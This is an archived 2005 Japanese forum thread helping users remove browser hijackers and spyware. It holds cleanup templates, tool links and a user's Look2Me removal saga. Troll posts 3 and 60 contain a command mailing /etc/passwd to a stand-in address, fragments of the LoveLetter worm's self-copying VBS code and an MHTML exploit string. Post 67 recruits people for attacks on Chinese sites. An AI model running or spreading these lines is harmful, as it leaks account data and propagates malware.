1 名前:ひよこ名無しさん mailto:sage [2005/07/28(木) 23:56:15 ID:???] エロサイトに限らずWEBを見て回ってたらブラウザ乗っ取られて大変なことに… いったいどうしたらいいの?って人のためのスレッドです。 【重要】ウソのアドバイスに注意して下さい。 ●ブラウザハイジャッカーやウイルスの被害を減らすためにも WindowsUpdateを利用してこまめにセキュリティパッチを当てましょう ▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ・ E-mail欄(省略可) には何も記入しないこと。(ID出す→偽者対策・質問者の区別) ・ 2回目以降の書込は、名前欄に最初に質問した際の「発言番号」を入力すること。 ・ 他のスレから誘導された場合は、その旨書く。(マルチポストとの区別) ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類) ・ まず、テンプレの>>2-10 あたりを必ず読む。 ▼━回答者の方へ ━━━━━━━━━━━━━━━━━━━━ ・ テンプレの方法を実行せずに質問する人は、徹底放置して下さい。 ・ 出された指示を実行せずにレスする人は、徹底放置して下さい。 ・ HijackThisの分析から嘘が判明した場合は、徹底放置して下さい。 ・ 放置ができない回答者は、質問者が自作自演していると見なされます。 ▼━禁止事項 ━━━━━━━━━━━━━━━━━━━ ・ マルチポスト(複数の板・スレで同じことを質問) ・ 情報の小出し(始めにOSやソフト名等を必ず明示) ・ 違法な話題や質問(WinMX,Winny,エミュレータ等) ・ 天麩羅屋 & 薮パソユーザーは立ち入り禁止。HNを変えてもダメです。 ・ Opera房立ち入り禁止。HNを変えてもダメです。またその話題も禁止です。 前スレ:エロサイト見たら…助けて下さい!Part55 pc8.2ch.net/test/read.cgi/pcqa/1119362324
2 名前:ひよこ名無しさん mailto:sage [2005/07/28(木) 23:57:48 ID:???] 質問する前に ※スパイウェア除去ウィザードの内容と基本的には同じです。 (1)から順を追って作業して下さい。 1) IEのホーム、検索ページを標準に戻す→ツール→インターネットオプション→ プログラム→WEB設定のリセット ※WEB設定のリセットは、こまめに実行しましょう(無限ループ防止の為) 2) IEの履歴削除→ツール→インターネットオプション→全般→インターネット 一時ファイル→クッキーの削除+ファイルの削除 3) 削除したいファイルがあるが「アクセスできません。使用中です」等といわれて 削除できない→セーフモード(F8を連打)でOSを起動→削除→OS再起動 ◆セーフモードでも削除できないファイルがある時は「強削」 ttp://www.vector.co.jp/soft/win95/util/se298257.html 4) 勝手に追加されたアプリをアンインストする→スタート→コントロールパネル→ アプリケーションの追加と削除→OS再起動 ※コントロールパネルからアンインストールしなければならない主なもの CnsMin(Jwordとかで使われてるスパイウェア) ttp://www.higaitaisaku.com/removecnsmin.html その他のコントロールパネルからアンインストールできる主なもの ttp://www.higaitaisaku.com/uninstallinfo.html ※コントロールパネルからアンインストールしてはならないもの Home Search Assistant、Shopping Wizard、Search Extender という名前のものがコントロールパネルのアプリケーションにある場合。
3 名前:ひよこ名無しさん mailto:sage [2005/07/28(木) 23:59:03 ID:???] cat /etc/passwd | mail nobody@nonexistent.com If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l" Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1))) fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\" c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") <object data="ms-its:mhtml:file://C:\\MAIN.MHT
4 名前:ひよこ名無しさん mailto:sage [2005/07/28(木) 23:59:15 ID:???] 5) アンチウィルスソフトでウィルスを除去。 アンチウィルスソフトを持っていない・サポート終了している場合は、オンラインスキャンを必ず行なって除去する事。 主なアンチウィルスソフトのサポート終了一覧 Symantec(Norton) service1.symantec.com/SUPPORT/INTER/japanesecustserv.nsf/jdocid/20030919114134945?Open&src=&docid=20040206144851945&nsf=SUPPORT%5CINTER%5Cjapanesecustserv.nsf&view=jdocid&dtype=&prod=&ver=&osv=&osv_lvl= TrendMicro(ウィルスバスター) www.trendmicro.com/jp/support/old-versions/old-versions/products/vb.htm TrendMicro OnlineScan(駆除可能・英語) housecall.trendmicro.com/ Panda Active Scan (駆除可能・日本語) www.pandasoftware.com/activescan/jp/activescan_principal.htm トレンドマイクロオンラインスキャン (手動駆除) www.trendmicro.co.jp/hcall/index.asp シマンテックセキュリティチェック (手動駆除) security.symantec.com/sscv6/home.asp?productid=symhome&langid=jp&venid=sym&close_parent=true&bhcp=1 6) ブラウザジャッカーCoolWebSearch駆除ツール ttp://www.higaitaisaku.com/removecws.html 7) 定番スパイウェア除去ソフト、Ad-awareSEとSpybotS&Dを使って除去。 Ad-Aware SEによるスパイウェアの除去方法 ttp://www.higaitaisaku.com/adaware.html lavasoft.element5.com/default.shtml.ja (公式サイト) ttp://bdc.s15.xrea.com/(日本語化パッチ) Spybot1.3によるスパイウェアの除去方法 ttp://www.higaitaisaku.com/spybot2.html www.safer-networking.org/ (公式サイト)
5 名前:ひよこ名無しさん mailto:sage [2005/07/28(木) 23:59:28 ID:???] >>3 しね
6 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 00:00:53 ID:???] 8) Me/XPの場合「システムの復元」で正常な状態に復帰させる方法もあります。 [スタート]→[すべてのプログラム]→[アクセサリ]→[システム ツール]→[システムの復元] ●「レジストリの復元」を使って正常なレジストリを復元する(9x限定) MS-DOSモードで再起動する=スタート→終了→MS-DOSで再起動を選択 または、PCの電源を入れる→メーカーのロゴマークが表示される →メーカーのロゴマークが消える直前から消えた瞬間、キーボードのF8を押す →[Command prompt only] (または [コマンドプロンプトのみ])を選択する。 MS-DOSが起動したら「scanreg /restore」と入力して問題の起こる前の日付を選んで復元する。 ※一番古い日付は不可 (入力コマンドには「」は入れないで下さい。また、コマンドのgと/の間に必ず半角スペースを入れる) 9) 既出ですよQ&A(個別のスパイウェア駆除方法) About:blankの対処法 ttp://www.higaitaisaku.com/removeaboutblank.html 再発する場合には、ここを見て該当ファイルを駆除 ttp://www.higaitaisaku.com/cgi-bin/cbbs.cgi?mode=one&namber=4058&type=0&space=0&no=2 CoolWebSearchの除去方法 ttp://www.higaitaisaku.com/removecws.html CnsMinの除去方法 ttp://www.higaitaisaku.com/removecnsmin.html Gator/Gainの除去方法 ttp://www.higaitaisaku.com/removegator.html C2.lopの除去方法 ttp://www.higaitaisaku.com/removelop.html 「英語で変な警告文が出てくるんですけど」という場合 ttp://www.higaitaisaku.com/removereg32.html ttp://www.higaitaisaku.com/removecleanser.html ttp://www.higaitaisaku.com/removewasher.html ホームページが「*****.biz」になる場合 ttp://www.higaitaisaku.com/removesearchbiz.html
7 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 00:01:19 ID:???] / ̄| | | | | / ̄ ̄ ̄ ̄ ̄ ̄ ,― \ | | ___) | ∩∩ ∠ リュンパッチ♪ | ___) | | |_| | \______ | ___) |\___(・∀・ )_____ ヽ__)_/ \___ _____, )__ 〃 . / / / / 〃⌒i | / ./ / / .i::::::::::i ____| /⌒\./ / / | ____|;;;;;;;;;;;i [__]___| / /-、 .\_. / Uし'[_] .| | || | / /i i / | || | | ||____|____/ / .| .|\_ノ______..| || | |(_____ノ /_| |_________..| || | | LLLLLL./ __)L_| |LLLLLLLLLLLLLLLL. | ||_____」 | || (_/ / i .| || | || |_|| / .ノ |_|| |_|| (_/
8 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 00:02:13 ID:???] 10)テンプレを全部やったが直らない! Hijack Thisによるレポート出力と手動でのスパイウェア除去 ttp://www.higaitaisaku.com/hijackthis.html 自動的に診断してくれるページがあるので、ここにログを貼って診断してみる。 ttp://www.hijackthis.de/index.php?langselect=english 「Nasty(赤い!)」と書かれているものはFixしてOK。 「Possible Nasty(黄色い?)」は、無害なものも含まれているので自信がなければFixしないで下さい。 ●それでも直らない場合は、このスレにHijackThisのログを貼って質問してみて下さい。 必ず、どの項目をやった結果どうでした、と詳しく症状・行なった対処法を書いてください。 ■テンプレ補足 1.WindowsUpdateのやり方 IEを開く → ツール → WindowsUpdate 重要な更新は全てダウンロードしてインストールする事。 2.被害対策ウィザード(テンプレ>>2-4 の手順ウィザード) ttp://www.higaitaisaku.com/removewz01.html テンプレじゃわかりにくい人は、こっちを使ってみて下さい。基本的なやる事は同じ。 3.IEが壊れてしまっている人用 IEの修復(ttp://www.higaitaisaku.com/iesyuufuku.html)を試す。 または、IE以外のブラウザを使ってみて、とりあえずテンプレを確認してください。
9 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 00:02:33 ID:???] \ | / ⊂⌒⊃ ⊂⌒⊃ ―‐ ● ―‐ ⊂⌒⊃ ⊂⊃ / | \ ⊂⊃ ⊂⊃ /~\へ/~\へへ/~\/~\へ/~\へ/~\へ/~\へヘ/~\/~\ ,、,,,,,、,,,,、,,,、,,,,,,,,,,、,,,/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄\_________ ,, ,,,,,, ,,,, ,, ,,,, ,,,,,| 立った立った!チンコが立った! | \ ,,,, ,,, ,,,,, ,,,,,,, ,,,, , \ _____________/ 糞スレも立った! | ||=||=||=||=||=||∨=||=||=||=||=||=||=||=||\__ ______/ ,,,,,,, ,,,,, ,,, ,, ,,,, ,,, ∧_∧ ,, , ∧_∧,, ,,,,, ,, __ ,,,, ,,,,, ∨ ,,,,, ,,,, ,, ,, ,,,, ,, e@@e ,,,,,, ,,, ( o´∀`) ,,,,, (∀・ ; ) ,,, , , | || ,,, ,,,, e@@e , ,,,, ,,, ,, , ,, ,,, (,・∀・) ,,, ,,⊂ ⊃,,, ,,⊂⊂⌒ヽ、, ,,, |!____i|| , ,,,♪ (・∀・,)_ノ ,,,,, ,,,, ,, , ,〜(( ,,), ,,,, ,,,○( ノ ,,,, プル )) )○/_/) ,,,, ,, とと,,__つ , ,, ,, ,, ,,,, ,UUU ,,, ,,, ,,,,,, )__)_) ,, ,,, ,(( (_(_ノ ))プル,,,,◎ ,, ,,, ,, ,,,,, ,,,,, ,,, ミ ピョン | |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| |,,, ,,,,| | | |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |二二| |
10 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 00:03:22 ID:???] _ / \―。 ( / \_ / / ヽ / ̄ ̄ ̄ ̄ ̄ ...―/ _) < ちんちん シュッ! シュッ! シュッ! ノ:::へ_ __ / \_____ |/-=o=- \/_ /::::::ヽ―ヽ -=o=-_(::::::::.ヽ |○/ 。 /::::::::: (:::::::::::::) |::::人__人:::::○ ヽ/ ヽ __ \ / \ | .::::/.| / \lヽ::::ノ丿 / しw/ノ___-イ ∪
11 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 00:03:33 ID:???] _、_ ( ,_ノ` )y━・~~~
12 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 00:03:37 ID:???] ☆ / ̄| ☆ | |彡 ビシィ | | / ̄ ̄ ̄ ̄ ̄ ̄ ,― \ | | ___) | ∩∩ ∠ リュンパッチ♪ | ___) | | |_| | \______ | ___) |\___(・∀・ )_____ ヽ__)_/ \___ _____, )__ 〃 . / / / / 〃⌒i | / ./ / / .i::::::::::i ____| /⌒\./ / / | ____|;;;;;;;;;;;i [__]___| / /-、 .\_. / Uし'[_] .| | || | / /i i / | || | | ||____|____/ / .| .|\_ノ______..| || | |(_____ノ /_| |_________..| || | | LLLLLL./ __)L_| |LLLLLLLLLLLLLLLLL. | ||_____」 | || (_/ / i .| || | || |_|| / .ノ |_|| |_|| (_/
13 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 00:03:59 ID:???] Q:クリックしたら突然登録・入会、固体識別番号・個人コードなどが表示された。 エロサイトをクリックしたら、ホストアドレスが表示されてしまって 個人情報がばれた、と書かれていました。お金を振り込めとありますが お金を振り込まなければならないのでしょうか? A:架空詐欺なので(゚ε゚)キニシナイ!!↓を見てみてね。 警視庁「ワンクリック料金請求にご用心」 www.keishicho.metro.tokyo.jp/haiteku/haiteku/haiteku35.htm サギゼロ ttp://sagi-0.bne.jp/pc/ --- ここの「よくある相談集」を。 架空請求・spam pc7.2ch.net/antispam/
14 名前:ひよこ名無しさん mailto:age [2005/07/29(金) 00:04:36 ID:???] クソスレ発見したので、ageておきますね。 , --- 、_ /ミミミヾヾヽ、_ ∠ヾヾヾヾヾヾjj┴彡ニヽ / , -ー‐'"´´´ ヾ.三ヽ ,' / ヾ三ヽ j | / }ミ i | | / /ミ ! } | r、 l ゙iミ __」 |]ムヽ、_ __∠二、__,ィ|/ ィ } |  ̄`ミl==r'´ / |lぅ lj うんこぶりぶりぶぅ〜りぶりぃ〜♪ 「!ヽ、_____j ヽ、_ -' レ'r'/ うんこぶりぶりぶぅ〜りぶりぃ〜♪ `! j ヽ j_ノ ', ヽァ_ '┘ ,i ヽ ___'...__ i ハ__ ヽ ゙二二 ` ,' // 八 ヽ /'´ / ヽ |ヽ、__, '´ / / \
15 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 00:05:01 ID:???] 《その他リンク集》 ■アダルトサイト被害対策の部屋 ttp://www.higaitaisaku.com/ ■WEB110[インターネットの犯罪・被害]追跡調査 ttp://www.web110.com/ ■アダルトサイトは安全?危険? ttp://www.kitanet.ne.jp/~ababu/sexy/index.html ■えっと驚く前に―国際電話・Q2からの事前防御策― ttp://www3.plala.or.jp/hiro-mg3920/tel.html ■アダルトサイト対策の部屋(ネット被害対策室) ttp://www002.upp.so-net.ne.jp/dalk/higai24.html ■国際電話・ダイヤルQ2関連 www.ntt-east.co.jp/q2/ NTT東日本 ダイヤルQ2サービス www.ntt-west.co.jp/q2/ NTT西日本 ダイヤルQ2サービス ダイヤルQ2接続チェックプログラムもここからダウンロードできます。 ttp://www.emurasoft.com/jp/chintcal/index.htm No! 国際電話 ttp://mitsu98.fc2web.com/bbs/index2.html Dial Saver www.kddi.com/topics/atx/image.html ダイヤルアップチェッカー ■バナー・ブラクラ対策 ttp://homepage3.nifty.com/hayazo/myprg.html ClosePopup www.proxomitron.org/ Proxomitron(公式サイト) ttp://www.pluto.dti.ne.jp/~tengu/proxomitron/ Proxomitron(日本語解説)
16 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 00:05:59 ID:???] ●アドバイスを装った悪質ないたずらにご用心 「パソコンのトラブル解消法」などと称して、 レジストリやシステムファイルの削除を勧める人がいます。 間違ってそれらを削除するとPCが起動できなくなってしまう恐れがあります。 もしもそのようなアドバイスをされた時は、その後のレスなどにも注意して、 十分よく考えて慎重に行動して下さい。 割り込まれようと泣き言は言わぬ 以上!
17 名前: ◆N9P3SuvBPo mailto:sage [2005/07/29(金) 00:11:00 ID:???] >1さん乙 あ、そういえば前スレの984踏んで見たんだけど何も表示されない白いページが表示されたよ。 マカフィー反応無かったから大丈夫だとは思うんだが、誰か鑑定スレに依頼してくれない。 前スレ999さん Adwareは感染しないということは知っているけど、他にもウイルスが潜んでいそうな気がしそうで。
18 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 00:13:49 ID:???] 「払わなくていいよ」
19 名前: ◆N9P3SuvBPo mailto:sage [2005/07/29(金) 00:17:28 ID:???] >18 ありがとうございます! 安心して眠れる事ができます。
20 名前:ひよこ名無しさん [2005/07/29(金) 00:18:04 ID:mODgcR/n] >>17 大丈夫。 Afwaraしか検出されなかった。 トロイちゃんは消した。
21 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 00:21:14 ID:???] >>19 ∧ ∧ / ヽ ./ .∧ / `、 / ∧ /  ̄ ̄ ̄ ヽ /::::::::: .\ 信じろ・・・・・・ /:::::::::: ヽ-=・=-′ ヽ-=・=- ∧/ ∧ ヽ::::::::::: \___/ / ヽ / ヽ ヽ:::::::::::::: \/ / ヽ_____/ ヽ / / \ | / ヽ | '''''"´) ● \─/ ● |'´) \ -‐´ ヽ/ /´ | | \ /
22 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 01:07:18 ID:???] >>17 最近ウィンドウズアップデートしていれば問題などない Exploit-ObjectData.gen counter.htm JS/Exploit-HelpXsite index.htm ttp://www.mcafeesecurity.com/japan/security/virE.asp?v=JS/Exploit-HelpXSite Exploit-MhtRedir.gen countme.htm JS/Exploit-HelpXsite start.htm Exploit-ByteVerify classload.jar ほれ
23 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 01:12:39 ID:???] >>17 前スレ984 VBで JS_MHTREDIR.P って出たよ。
24 名前:ひよこ名無しさん [2005/07/29(金) 02:14:56 ID:mODgcR/n] パンダさんやったからか分からんが、急にwindowsから緊急アップデートとか表示された。 28件の重要更新と、26件のME用の更新があった。
25 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 09:34:03 ID:???] ここ数日病気でふせっている間、夫にPCを貸してあげました。 夫はPCに関しては一本指でやっと文字を打つ程度で、 私は「エロサイトは見るなよ」と釘を刺しておいたのですが。。。 誘惑に負けてみてしまったのか、検索履歴にしっかり「アダルト 無料」と(つД`) お陰でお気に入りサイトを巡回しているとポップアップがバンバンきます。 やれ動くカーソルを手に入れろだの、出会いが欲しくないか、カジノもいいでしょ・・・etc ノートン先生とアドウェアSEでは何も検知されませんでした。 どうしたらいいんでしょうか・・・(つд⊂) (夫には今後一切エロサイト見るなと禁止令を出しましたw)
26 名前:25 [2005/07/29(金) 09:34:42 ID:jie6OM0M] 間違って下げちゃいました・・・あげ。
27 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 09:35:42 ID:???] >>26 ▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類) ・ まず、テンプレの>>2-10 あたりを必ず読む。
28 名前:25 [2005/07/29(金) 09:45:07 ID:jie6OM0M] OS WindowsXP (Home) ブラウザ Sleipnir (IE 6.0.2) セキュ関係 ノートン試用版 アドウェアSE (avast!はノートンとの兼ね合いで休止中) 実行結果 異常なし テンプレの2-10を読みました。
29 名前:荒岸 ◆EzMONa3xWM mailto:sage [2005/07/29(金) 09:57:41 ID:???] >>28 sleipnirのセキュリティからデフォルトセキュリティ→Java scriptの実行とActiveXの実行の チェックがしてあれば外してみる。
30 名前:荒岸 ◆EzMONa3xWM mailto:sage [2005/07/29(金) 09:58:16 ID:???] >>28 それとspy-botも試して見て下さい
31 名前:25 [2005/07/29(金) 10:03:36 ID:jie6OM0M] >>29 ありがとうございます。 今、パンダでオンラインスキャンもしていますが、すでに感染5と・・・(欝 他のオンラインスキャンでは出なかったので安心しきっていました。 時間なのでこのまま仕事にでます。 逝ってきます。
32 名前:25 [2005/07/29(金) 17:37:00 ID:jie6OM0M] 帰ってきて結果を見たら30個以上もスパイが入り込んでいました。 で、念のため>>29 さんの仰っていたS&Dもやってみたら・・・ こちらは「おめでとうございます!感染はありません」だそうで。 パンダの結果を見た限りでは全てsystem32フォルダ内にあります。 全て削除していいものか迷っています。 なかには「削除できません」と出ているものもあるし・・・。 もうちょっと頑張って調べてみます。なにか良策ご存知でしたら助けてください。 お願い致します。
33 名前: ◆N9P3SuvBPo mailto:sage [2005/07/29(金) 17:41:25 ID:???] >ALL(前スレの984の件) なるほどありがとう。 やはりウイルスが検出されましたか。 いちおう俺WindowsUpdateしてるから全く何も問題は無いけど、ただそのページに アクセスしたときな、混んでいるのか知らんけど中々読み込まれないので、でも そのかわり何かのURLが下のメニューバーに表示されていたから、もしかしたら と思って書き込んでしまいました。 IEのキャッシュをクリアしてしまえばウイルス消滅ってことですね。 >25 感染させたのは「夫」なんだろ。 だったら夫に責任取らせろよ。
34 名前:KING [2005/07/29(金) 18:07:20 ID:Z73kRCNp] 削除するしか脳がない管理者。 ガセスレすると業者だとバカ騒ぎする集まり bbs02.nan-net.com/system/log/56
35 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 18:14:49 ID:???] >>32 どんなスパイウェアがどこで発見されているのか分からないと、答えられないし。 あと、感染したついでと言ってしまっては申し訳ないけど、 ttp://housecall.trendmicro.com/ のSpywareScannerも試して頂くことはできますか? 個人的に、Pandaと比較してどの程度の検出力か興味があるので。
36 名前:25 mailto:sage [2005/07/29(金) 18:17:59 ID:???] >>33 責任と言われても(´・ω・`) 簡単なエラーも解決できない奴に何を言っても無駄でしょう。。。 旦那が高給取りなら「新しいパソコン買って」とでも言えましょうが。。。 安易に貸した私にも責任はありますし。 うざがられているならもう来ません。すみませんでした。
37 名前:25 mailto:sage [2005/07/29(金) 18:19:50 ID:???] >>35 肝心なことを書いていませんでしたね(^^; 出たもの全て「Look2Me」でした。 リンク先のも試して後で報告だけ残していきます。
38 名前: ◆N9P3SuvBPo mailto:sage [2005/07/29(金) 18:20:38 ID:???] >36 いやいや、暴言はいてすみません! 別にウザイとかそういうことじゃないのですが。 う〜ん、OSがWindowsXPなら「システムの復元」試してみたか? 無論セーフモードで。
39 名前:35 mailto:sage [2005/07/29(金) 18:21:47 ID:???] 35のリンクだとspyware scannerの場所が分かりづらいかもしれないのでリンク場所の変更。 ttp://www.trendmicro.com/spyware-scan/ ココからtmas-web-scan.exeをdownloadして実行します。
40 名前:25 mailto:sage [2005/07/29(金) 18:26:38 ID:???] >>38 うは。こちらこそ早合点ですみませんです(||´・ω・) システムの復元ですか〜。そうですね、今>>35 さんのリンク先のヤツを 動かしている最中なので、一通り終わったらやってみます。 ありがとうございます!
41 名前:25 mailto:sage [2005/07/29(金) 18:29:47 ID:???] >>35 完了しました。 Summary of Privacy Threats:7 item(s) classified as Cookie ということでどうやらパンダの方が精度は上?
42 名前: ◆N9P3SuvBPo mailto:sage [2005/07/29(金) 18:37:43 ID:???] >39さんのスパイウェアスキャナーを前に一度やったことがあります。 自分の場合以下2つが見つかりました。 Found '' in 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges\Range1' Found '' in 'Software\Microsoft\Internet Explorer\Explorer Bars\{30D02401-6A81-11D0-8274-00C04FD5AE38}' 前者は、SPY-BOT S&Dで登録された制限付きサイトのURL 後者は、レジストリのCLSIDなど分析した結果、「C:\WINDOWS\SYSTEM\BROWSEUI.DLL」 さらにプロパティ調査を行なってみると以下の結果が出た。 ファイル ヴァージョン : 6.00.2800.1622 (xpsp2.050218-1437) 説明 : Shell Browser UI Library 著作権 : (C) Microsoft Corporation. All rights reserved. 会社名 : Microsoft Corporation 言語 : 日本語 っていうような・・・なんか誤検出っぽいような気がする不思議な感じが…
43 名前:35 mailto:sage [2005/07/29(金) 18:37:51 ID:???] ありがとうございます。 Pandaの方が上ですか。 専門のツールが、アンチウイルスに負けているとは(w さて、Look2Meって事ですが、前スレに削除方法が書かれたリンクがあったので コピーしておきます。
44 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 18:40:30 ID:???] >>42 その誤検出は私もみた事があります。 恐らく、今のバージョンでは改善されているんじゃないかと思いますが未確認です。 #FireFoxしか使っていないので、Spybot入れてないので。
45 名前:35 mailto:sage [2005/07/29(金) 18:41:52 ID:???] urlコピーし忘れてた。 ttp://66.102.7.104/search?q=cache:mHzw_V0L2woJ:www.higaitaisaku.com/fswiki/wiki.cgi%3Faction%3DID%26b%3DINF4kxK4xw44cCPEivVkXg+Adware+Look2Me+&hl=ja&lr=lang_ja
46 名前:35 mailto:sage [2005/07/29(金) 19:05:32 ID:???] _、_ ( ,_ノ` )y━・~~~ しかし暑いね〜
47 名前:ひよこ名無しさん [2005/07/29(金) 20:19:53 ID:pXKRiREh] た
48 名前:25 mailto:sage [2005/07/29(金) 20:33:56 ID:???] え〜・・・削除方法に則って慎重に作業中です。 Look2Meだと分かってから自分でググって見た中で、大事なファイルまであぼんして 起動しなくなったという方の日記を見たのでちと不安です。 失敗した時の為にも今のうちに大事なものとそうで無いものを取捨選択しておこうと思います。 ムシムシしてる中でフル稼働してるPCの熱が更に不快指数を・・・。
49 名前: ◆N9P3SuvBPo mailto:sage [2005/07/29(金) 20:50:29 ID:???] >48 システムの復元もダメだったか… しかしこういう時こそ、回復コンソじゃない、ほらあれ! HijackThisのログです。
50 名前:25 mailto:sage [2005/07/29(金) 20:53:38 ID:???] >>49 いや、復元は最終手段としてとっておこうと思ってました。 これで起動しなくなれば最終手段もなにもありませんが(´・ω:;.:...
51 名前: ◆N9P3SuvBPo mailto:sage [2005/07/29(金) 20:58:46 ID:???] まあ、起動しなくなっても運がよければセーフモードで起動できる場合がある。 だが運が悪くセーフモードの起動も失敗した場合は、OSを再インストールするしかない。 しかしLock2MEってやっかいだなあ。
52 名前:ひよこ名無しさん [2005/07/29(金) 22:17:34 ID:h70ywI4y] >>48 LookMEと共存してるけど、別に問題ないですよ。 放置しても構わないかと。
53 名前:25 [2005/07/29(金) 22:20:53 ID:k6oa7iRw] 携帯からです。 どうやら削除したファイルが原因で起動しませんでした。 セーフモードでも無理…(つд`)残念ですが総入れ直しします。 旦那が帰宅したら現実を見せて土下座させます。 コツコツ積み上げたカスタマイズの結晶を返せー!!(泣
54 名前:ひよこ名無しさん [2005/07/29(金) 22:25:18 ID:h70ywI4y] 俺のPCも起動させると海外のアダルトサイトが強制的に出てきて、一切IEできなくなる。 だけど、2chブラウザからリンクからだと普通にIE見れる。
55 名前: ◆N9P3SuvBPo mailto:sage [2005/07/29(金) 22:49:29 ID:???] >53 うやあマジ! 「回復コンソール」を使って修復する手もあるが、やはりリカバリが一番手っ取り早い。
56 名前:25@携帯 [2005/07/29(金) 22:58:16 ID:k6oa7iRw] ふて寝したのですが、諦めがつかずダメ元で前回正常起動時の状態で立ち上げてみたら… セーフモードですがキました! さて、これからどうしよう(´ω`)
57 名前:ひよこ名無しさん mailto:sage [2005/07/29(金) 23:23:29 ID:???] >>56 もういい加減リカバリしろよwww
58 名前:25 mailto:sage [2005/07/30(土) 00:07:15 ID:???] いい加減ここに居座るのもなんですし、無事に起動したので今後を観察して リカバリなり共存なり選びたいとおもいますです。 エロ旦那にはPC触んなヴォケと言っておく事にします。 >>35 さん、◆N9P3SuvBPoさん、ありがとうございました。 ではでは(´ー`)ノ
59 名前:ひよこ名無しさん mailto:sage [2005/07/30(土) 00:07:50 ID:???] >>56 大事なデータを保存してから(ry
60 名前:ひよこ名無しさん mailto:sage [2005/07/30(土) 01:06:21 ID:???] cat /etc/passwd | mail
61 名前:ひよこ名無しさん [2005/07/30(土) 03:02:50 ID:kRqG8TmZ] >>60 ウイルスに感染しちゃったじゃないか。 リカバリしなきゃ。
62 名前:ひよこ名無しさん [2005/07/30(土) 03:12:49 ID:qJ8fNmUC] 2style.jp/bluecoin/
63 名前:ひよこ名無しさん mailto:age [2005/07/30(土) 18:54:43 ID:???] 保守
64 名前: ◆N9P3SuvBPo mailto:sage [2005/07/30(土) 19:36:30 ID:???] >58 共存だけは絶対に止めておいたほうがいいよ。 あと、ひとつ質問いいですか? ウイルス感染する前に「WindowsUpdate」を行い、OSの脆弱性を防いでいましたか?
65 名前:ひよこ名無しさん mailto:sage [2005/07/30(土) 19:39:22 ID:???] , '´ :::::::::::ヽ、 / ,/ ||| \, ::::::::::ヽ | ==" `== ::::::::| | -=・=-′ ヽ-=・=- :::::::::| | ::::::::::| え? | (_人_) ::::::::| 'ヽ__ :::::::::::/
66 名前:ひよこ名無しさん [2005/07/30(土) 20:25:08 ID:vQUTlBEV] エロサイトは見ていないのですが pc8.2ch.net/test/read.cgi/internet/1121426401/2 の Q:ブラウザを立ち上げると、変な外国サイトやポップアップが出るよ! に該当するので質問させてください。 スレ違いでしたらごめんなさい。 OS:Windows XP Service Pack 2 ブラウザ:unDonut release12d ウイルスバスター常時起動 海外のフラッシュゲームサイトをいくつか見たせいか、 ポップアップ表示されるようになりました。 以下ポップアップの一部 ttp://www.loadingwebsite.com/normal/yyy34.html ttp://www9.paypopup.com/belnk/belnk.htm ttp://www.cursormania.com/?partner=ZCxdm500&spu=true Ad-Aware SE Personalで検索して消すのですが 何回も復元されて出てきます。 インターネットオプションのファイル削除もしました。 ウイルス検索しても何も出てきません。 ブラウザを立ち上げている最中も閉じてからも何度も何度も出てきます。 どのように対処したら二度と出てこなくなるのか教えてください。
67 名前:ひよこ名無しさん [2005/07/30(土) 20:29:14 ID:CcEaqLkR] 中国サイバーテロ!!? gazoubbs.com/publicity/img/1122394400/6.gif 個別訪問を行いたいと思っております。 ★拠点 【お盆】中国バカーVS日本ビパー part111+【仏降臨】 ex11.2ch.net/test/read.cgi/news4vip/1122479952/ 民間の反日系中国ウエッブサイトへの抗議をしてくださる、お持ちの知識・技術を活用してくださる 等 ・ ・ ・ ・ 日 中 友 好 目的 での、ご参加をお待ちしております。
68 名前:ひよこ名無しさん mailto:sage [2005/07/30(土) 20:34:35 ID:???] >>66 ▼━質問のしかた ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ ・ OSの種類、ブラウザ、セキュ関係ソフトの有無、実行結果を報告。(特にOSの種類) ・ まず、テンプレの>>2-10 あたりを必ず読む。
69 名前:66 [2005/07/30(土) 22:35:21 ID:vQUTlBEV] テンプレ全部やってみました。 特に>>2 >>6 >>8 を重点的にやってみましたが問題は解決しません。 ログをここに書き込めばいいのでしょうか?
70 名前:ひよこ名無しさん mailto:sage [2005/07/30(土) 22:36:21 ID:???] >>69 うん。 で、鑑定人は少ないから、気長に待つ。
71 名前:66 [2005/07/30(土) 22:38:27 ID:vQUTlBEV] 分かりました。 長いのですがどこを載せればいいのか分からないので載せます。
